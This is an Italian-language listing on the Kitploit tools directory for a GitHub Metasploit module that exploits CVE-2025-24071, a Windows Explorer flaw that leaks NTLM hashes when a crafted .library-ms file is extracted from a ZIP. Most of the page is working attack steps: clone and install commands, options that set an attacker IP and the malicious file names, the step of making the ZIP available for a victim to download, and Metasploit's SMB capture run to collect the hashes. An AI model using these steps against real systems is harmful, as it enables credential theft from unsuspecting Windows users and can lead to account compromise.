Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-24071-msfvenom — Modulo Metasploit per CVE-2025-24071 - Fuga di hash NTLM di Windows tramite .library-ms | Kitploit
Strumenti/GitHubGitHub/folks-iwd/cve-2025-24071-msfvenom
Framework di ExploitAttacchi alle PasswordGenerazione di PayloadAnalisi delle VulnerabilitàExploit
GitHubfolks-iwd/cve-2025-24071-msfvenom

CVE-2025-24071-msfvenom

Modulo Metasploit per CVE-2025-24071 - Fuga di hash NTLM di Windows tramite .library-ms

Vedi Repository
2551 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-24071: Perdita di hash NTLM tramite file .library-ms (Modulo Metasploit)

Questo repository contiene un modulo Metasploit per sfruttare CVE-2025-24071, una vulnerabilità in Esplora file di Windows che perde hash NTLM quando un file .library-ms dannoso viene estratto da un archivio ZIP.

Sviluppato da: FOLKS-IWD


Panoramica

La vulnerabilità si verifica quando un utente estrae un archivio ZIP contenente un file .library-ms appositamente creato. Esplora file di Windows avvia automaticamente una richiesta di autenticazione SMB a un server remoto specificato nel file, perdendo l'hash NTLM dell'utente senza alcuna interazione da parte dell'utente.

Questo modulo Metasploit:

  1. Genera un file .library-ms dannoso.
  2. Lo impacchetta in un archivio ZIP.
  3. Si integra con la funzionalità di cattura SMB di Metasploit per raccogliere hash NTLM. image

Installazione

  1. Clona il repository:
    root@kitploit:~
    git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
    cd CVE-2025-24071-msfvenom
    
  2. Copia il modulo nella directory dei moduli di Metasploit:
    root@kitploit:~
    cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
    

Utilizzo

  1. Carica il modulo:
    root@kitploit:~
    use auxiliary/server/ntlm_hash_leak
    
  2. Imposta le opzioni richieste:
    root@kitploit:~
    set ATTACKER_IP 192.168.1.162  # Replace with your IP address
    set FILENAME exploit.zip       # Name of the malicious ZIP file
    set LIBRARY_NAME malicious.library-ms  # Name of the .library-ms file
    set SHARE_NAME shared          # SMB share name
    
  3. Esegui il modulo :
root@kitploit:~
  run
  1. Il modulo genererà un file ZIP dannoso (exploit.zip). Metti a disposizione questo file affinché la vittima possa scaricarlo ed estrarlo.
  2. Usa il modulo di cattura SMB di Metasploit per raccogliere hash NTLM:
    root@kitploit:~
    use auxiliary/server/capture/smb
    set SRVHOST 192.168.1.162  # Same as ATTACKER_IP
    run
    
Scarica lo strumento